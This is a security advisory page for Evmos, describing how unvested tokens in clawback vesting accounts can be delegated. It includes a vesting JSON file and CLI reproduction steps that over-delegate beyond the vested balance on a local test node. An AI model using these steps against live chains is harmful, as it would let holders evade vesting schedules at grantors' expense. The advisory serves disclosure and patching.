GHSA-7hrh-v6wp-53vw

Suggest an improvement
Source
https://github.com/advisories/GHSA-7hrh-v6wp-53vw
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-7hrh-v6wp-53vw/GHSA-7hrh-v6wp-53vw.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-7hrh-v6wp-53vw
Aliases
Published
2024-06-06T19:10:21Z
Modified
2024-10-15T23:34:18Z
Severity
  • 5.3 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N CVSS Calculator
Summary
Evmos allows unvested token delegations
Details

Impact

What kind of vulnerability is it? Who is impacted?

At the moment, users are able to delegate tokens that have not yet been vested. This affects employees and grantees who have funds managed via ClawbackVestingAccount.

Patches

Has the problem been patched? What versions should users upgrade to?

The PR linked to this advisory includes part of the fix. The remainder is in a second advisory on the Cosmos SDK fork.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

There is no effective workaround to fix or remediate this issue without a new release. The best solution is to contain the information about this vulnerability to minimize the number of users who know about it and can thus exploit it.

References

Are there any links users can visit to find out more?

See the integration tests for more details on the exploit, or use the following to reproduce it on the CLI:

  1. Download vesting_setup.json with the following contents:

    {
      "start_time": 1679602272,
      "periods": [
        {
          "coins": "100000000000000000000aevmos",
          "length_seconds": 10 
        },
        {
          "coins": "100000000000000000000aevmos",
          "length_seconds": 259200000
        }
      ]
    }
    
  2. Run the following CLI commands to reproduce the issue locally:

    evmosd tx vesting create-clawback-vesting-account evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --vesting vesting_setup.json --from dev0 --fees 2000000000000000aevmos --home ~/.tmp-evmosd --yes
    
    # Verify that the balance contains zero locked tokens, 1000000000000000aevmos vested, 1000000000000000aevmos unvested
    evmosd q vesting balances evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd
    
    evmosd keys add key1 --recover --home ~/.tmp-evmosd
    # Enter the following mnemonic
    skate tell option purity cattle poverty street act bone govern way various
    
    evmosd q staking validators --home ~/.tmp-evmosd | grep operator_address
    
    # Substitute the operator address from the previous query
    # Note that this delegates 70% of the user's available stake
    evmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes
    
    # Re-run the same command
    evmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes
    
    # Note that the total delegations now exceed the user's vested balance
    evmosd q staking delegations evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd
    
Database specific
{
    "nvd_published_at": "2024-06-06T19:15:58Z",
    "cwe_ids": [
        "CWE-285",
        "CWE-863"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-06T19:10:21Z"
}
References

Affected packages

Go / github.com/evmos/evmos/v18

Package

Name
github.com/evmos/evmos/v18
View open source insights on deps.dev
Purl
pkg:golang/github.com/evmos/evmos/v18

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
18.1.0

Go / github.com/evmos/evmos/v17

Package

Name
github.com/evmos/evmos/v17
View open source insights on deps.dev
Purl
pkg:golang/github.com/evmos/evmos/v17

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
17.0.1

Go / github.com/evmos/evmos/v16

Package

Name
github.com/evmos/evmos/v16
View open source insights on deps.dev
Purl
pkg:golang/github.com/evmos/evmos/v16

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
16.0.4

Go / github.com/evmos/evmos/v15

Package

Name
github.com/evmos/evmos/v15
View open source insights on deps.dev
Purl
pkg:golang/github.com/evmos/evmos/v15

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
15.0.0

Go / github.com/evmos/evmos/v14

Package

Name
github.com/evmos/evmos/v14
View open source insights on deps.dev
Purl
pkg:golang/github.com/evmos/evmos/v14

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
14.1.0

Go / github.com/evmos/evmos/v13

Package

Name
github.com/evmos/evmos/v13
View open source insights on deps.dev
Purl
pkg:golang/github.com/evmos/evmos/v13

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
13.0.2

Go / github.com/evmos/evmos/v12

Package

Name
github.com/evmos/evmos/v12
View open source insights on deps.dev
Purl
pkg:golang/github.com/evmos/evmos/v12

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
12.1.6

Go / github.com/evmos/evmos/v11

Package

Name
github.com/evmos/evmos/v11
View open source insights on deps.dev
Purl
pkg:golang/github.com/evmos/evmos/v11

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
11.0.2

Go / github.com/evmos/evmos/v10

Package

Name
github.com/evmos/evmos/v10
View open source insights on deps.dev
Purl
pkg:golang/github.com/evmos/evmos/v10

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
10.0.1

Go / github.com/evmos/evmos/v9

Package

Name
github.com/evmos/evmos/v9
View open source insights on deps.dev
Purl
pkg:golang/github.com/evmos/evmos/v9

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
9.1.0

Go / github.com/evmos/evmos/v8

Package

Name
github.com/evmos/evmos/v8
View open source insights on deps.dev
Purl
pkg:golang/github.com/evmos/evmos/v8

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
8.2.3

Go / github.com/evmos/evmos/v7

Package

Name
github.com/evmos/evmos/v7
View open source insights on deps.dev
Purl
pkg:golang/github.com/evmos/evmos/v7

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
7.0.0

Go / github.com/evmos/evmos/v6

Package

Name
github.com/evmos/evmos/v6
View open source insights on deps.dev
Purl
pkg:golang/github.com/evmos/evmos/v6

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
6.0.4